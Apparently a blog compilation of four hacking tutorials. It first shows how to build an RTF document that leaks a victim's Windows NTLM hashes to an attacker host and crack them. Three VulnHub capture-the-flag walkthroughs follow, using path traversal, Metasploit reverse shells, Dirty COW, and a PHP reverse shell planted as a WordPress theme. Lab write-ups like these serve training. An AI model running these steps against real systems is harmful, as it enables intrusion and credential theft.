Stealing Windows Credentials of Remote PC with MS Office Document

Hello! Today you will found something incredible in this article which is related to a newly lunched script named as “WORD STEAL” that can define your hacking skill more and more. This script will create a POC that will steal NTML hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to a SMB server and the victim will authenticate with his logins credentials. This is very useful during a Pentest because allows you to steal credentials without triggering any alerts and most of the security apps do not detect this.

LET’s Broach!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007)

First we need to download it from Git hub, open the terminal in your Kali Linux and type following command.

Git clone https://github.com/0x090x0/WordSteal.git

Now open the downloaded folder word steal where you will get a python script “main.py” give all permissions to main.py script if required.

Chmod 777 main.py

 As author has described that this script will convert an image or say .jpg into .rtf (Microsoft word file) The Rich Text Format is a proprietary document file format with published specification developed by Microsoft Corporation for cross-platform document interchange with Microsoft products.  

 After then download an image and save it inside Wordsteal folder, since I have an image “1.jpg” at this moment we require to type following command which generates .rtf file that steal NTML hashes from a remote computer.

Python main.py 192.168.0.104 1.jpeg 1

Above command will generate .rtf file as you can figure out this in the given screenshot, after then send 1.rtf file to remote PC.

When victim will open 1.rtf (as Microsoft word file) in his system, on other hand attack will receive NTML hashes.

Inside word steal we have stolen credentials without triggering any alerts which you can observe in following image.

Now use password crack tool to read password_netntlmv2 file or type following command

John password_netntlmv2

Cool!!! We can see victim’s credential clearly RAJ: 123 that might be further use for login.

Hack the Pluck VM (CTF Challenge)

Coming towards another tutorial of vulnhub’s lab challenges “pluck” you can download it from here.

This lab is quite simple this article may help you to solve the task for capturing the flag.

LET’S START!!!

192.168.1.115 is my target IP let enumerate through aggressive scan using NMAP. You can observe its result from given screenshot.

Nmap –p- -A 192.168.1.115

Use nikto to dig up more information related to target

Nikto –h http://192.168.1.115

Finally I have got something very remarkable here if you notice the given below image the highlighted text looks like local file inclusion vulnerability.

So when I explore the above highlighted text in the browser here I got more than enough data. The highlighted text denotes towards some kind of backup script file path.

 http://192.168.1.115/index.php?page=../../../../../../../../etc/passwd

When again I walk around it now further I found a tar file for backup.

 http://192.168.1.115/index.php?page=/usr/local/scripts/backup.sh

Download tar file of backup script, type following command inside the terminal of your kali Linux.

Wget http://192.168.1.115/index.php?page=/backups/backup.tar

Now type following command to extract backup.tar file

Tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar

Inside it I found home folder which further contains sub folder for 3 users.

Among all 3 users only paul has keys

cd paul

ls

cd keys

ls

So here I found 6 keys, let use one of them for connection.

Ssh –I id_key4 paul@192.168.1.115

When you will try to connect with target using ssh simultaneously a new terminal “Pdmenu” will pop up. Here I got so many option but I choose Edit file option that gave me a prompt to edit any file and it look like command injection vulnerability.

Now load metasploit framework and type following

Msfconsole

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>set lhost 192.168.1.15 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set svrport 8081

msf exploit (web_delivery)>exploit

Now copy the generated command php….5tz’));” and send it to target

Now paste above command as shown in the screenshot and hit enter which will give you reverse connection at the background inside metasploit.

Great!!! We have got victim’s meterpreter session

Meterpreter>shell

Uname –a

When I looked in Google I found Kernel 4.8.0 has Dirty cow vulnerability it is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem.

Here got the path to download exploit which might be related to it.

Open this path “http://www.exploit-db.com/download/40616” in browser and downloads the exploit for dirty cow vulnerability. I have saved this exploit as raj.

Now type following command to compile your exploit so that it can run successfully inside your Kali Linux.

Gcc shell.c –o raj –pthread

Now we can run our exploit to achieve root permission and try to capture the flag

./raj

Cd /root

Ls

Cat flag.txt

 Bravo!!! We have captured the flag an beat this task………..

Hack the Sedna VM (CTF Challenge)

Today we found a Vulnerable Lab based on the 90377 Sedna. Sedna is a dwarf planet in our solar system. This vulnerable machine was created for the Hackfest 2016. We are going to download the VM Machine from here.

The credit for developing this VM machine goes to Viper.

Penetrating Methodologies

1.      Scanning Network

·        TCP and UDP ports scanning using nmap

2.      Testing Port 80

·        Surfing HTTP service on Web Browser

3.      Directory Scanning

·        Scanning using nikto

4.      Exploiting BuilderEngine

·        Using the Metasploit module to get meterpreter session

5.      Retrieving Flag 1

6.      Exploiting chkrootkit

·        Using the Metasploit module to get the root shell

7.      Retrieving Flag 2

Let’s Breach!!!

As always, Let’s start from doing a port enumeration on the IP Address using the nmap tool. (Here, we have it at 192.168.1.110 but you will have to find your own).

nmap -sV 192.168.1.110

From the NMAP Version Scan we enumerated the following details:

Port No.	Service
Port 22	SSH
Port 53	ISC Bind
Port 80	HTTP
Port 110	POP3
Port 111	RPC Bind
Port 139	NetBIOS
Port 143	Imap
Port 445	NetBIOS
Port 993	SSL/IMAPS
Port 995	SSL/POP3S
Port 8080	HTTP

As the HTTP service is running on the target server, let’s open the IP Address on the Web Browser.

Here we decided to scan the target directory using nikto scan. Now open the terminal in Kali Linux and type the following command:

nikto -h http://192.168.1.110/

From the scanning result, we chose the highlighted file link for further enumeration. That is the license.txt.

Opening the license.txt in our browser gave us our way in. This is what we looking for in the first place. If we take a closer look than we can find that we have the BuilderEngine 2015 version installed on the target system. A little bit of research here and there and we learned that we have a module in Metasploit that we can use to get a meterpreter session on the target machine.

So, let’s work on it. Firstly, we will open a terminal in out Kali Linux and then we will type msfconsole on it. This will open Metasploit Framework. After this we will proceed by using the module and providing it with RHOST. RHOST is the remote host IP address, which in our case is 192.168.1.110.

use exploit/multi/http/builderengine_upload_exec

set rhosts 192.168.1.110

exploit

After exploiting, we get a meterpreter session as shown in the given image. We used the sysinfo command to get the information about the target machine and we can observer that it is Sedna. Now we use the pwd command to retrieve the working directory we have the shell in. It is /var/www/html/files.

Now, that we are inside the target machine all that we need is to retrieve the flags and complete the challenge completely. After doing a bit enumeration here and there, we found a flag inside the /var/www directory. So, we traversed to that directory using the cd command. Now to read the flag we need to get a bash shell over the machine. Now, we will use the shell command to get a bash shell but what we got was an improper shell. So, we will use the python one liner to get a proper shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Since we have the proper shell now, let’s read the flag using the cat command.

Now, let’s work out our way to another flag. We traversed to the /etc directory and here we found the directory named chkrootkit. On traversing inside it, we get a README. Upon reading the README we get the version of chkrootkit. The version is found out to be 0.49.

Let’s get back to our beloved Metasploit and search for an exploit for the chkrootkit. We learned that we have a module in Metasploit that we can use to get a root shell on the target machine.

So, let’s work on it. On the Metasploit terminal. After this we will proceed by using the module and providing it with the session id.

use exploit/unix/local/chkrootkit

set session 1

exploit

This gives us a shell whose privilege we checked using the id command. We checked the contents of the directory using the ls command. We can see the flag.txt inside this directory. Now for the final step, we will use the cat command to read the root flag

Hack the Quaoar VM (CTF Challenge)

Once again we are with the Vulnhub labs tutorial; this article is related to CTF lab where you will face three challenges to complete the task. This lab is pretty good for beginner as they have to seize only three flag: 1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box. You can download this VM from here.

Let’s start..

Firstly, scan the target IP with aggressive scan using Nmap tool as given in the image.

nmap -p- -A 192.168.1.24

With the nmap result you can see that port 22, 53, 80, 110, 139, 143, 445, 993 and 995 are open with the services like SSH, HTTP and many others.

Since port 80 is working, open the victim IP 192.168.1.24 in the browser. You can see its home page in the image below :

Nmap scan also shows that robots.txt. Once accessed robots.txt it will show you that website is in wordpress, which is exploitable to in this scenario.

Let’s check out wordpress directory in the browser once.

Further, when I explored the following path: 192.168.1.24/wordpress/wp-login.php in the browser, I found a WordPress administrator console.

To breach administrator console of the WordPress we can use WPScan tool; now type the following command to start wpscan enumeration.

wpscan --url http://192.168.1.24/wordpress/ --enumerate u

WPScan’s result will show two users as you can see in the image below. We will move forward with admin user.

I used default log in credentials i.e. admin:admin and therefore I was logged in as Admin. Now, under the console we can upload any theme, taking advantage of the rights we have obtained, we will try to upload the malicious script to achieve reverse connection from victim’s system. The script we will use can be downloaded from : http://pentestmonkey.net/tools/web-shells/php-reverse-shell 

Now copy the PHP text from *  and paste it as new theme under selected 404.php template.

Now type the following commands to have session through netcat :

nc –lpv 1234

Once you have the session, use the following commands to navigate around :

cd /home

ls

In /home I found wpadmin folder which is obviously important so let’s check it for a flag using following commands :

cd wpadmin

ls

cat flag.txt

This way, in the above image you see that we have found our first flag.

Another important file in wordpress is Wp-config.php. Therefore, after  exploring this file I found MYSQL Setting. This contained credentials for root. If you notice the image below you’ll observe that the username and password i.e. root: rootpassword

Let’s switch the user to root and then in the root folder you will find the second flag too. So, use the  following commands for the said task :

su

rootpassword!

cd /root

ls

cat flag.txt

Now, we all know that cron.d is an important linux directory and I just checked it for the sake of it and there I found our last and third flag. Use the following commands to achieve that :

cd /etc

cd cron.d

ls

cat php5

Ohh-Yah!  We have successfully captured all 3 flags. Hence, we have successfully completed the CTF.

 Author: Arpit Pandey is a Certified Ethical Hacker, Cyber Security Expert, Penetration Tester. Contact here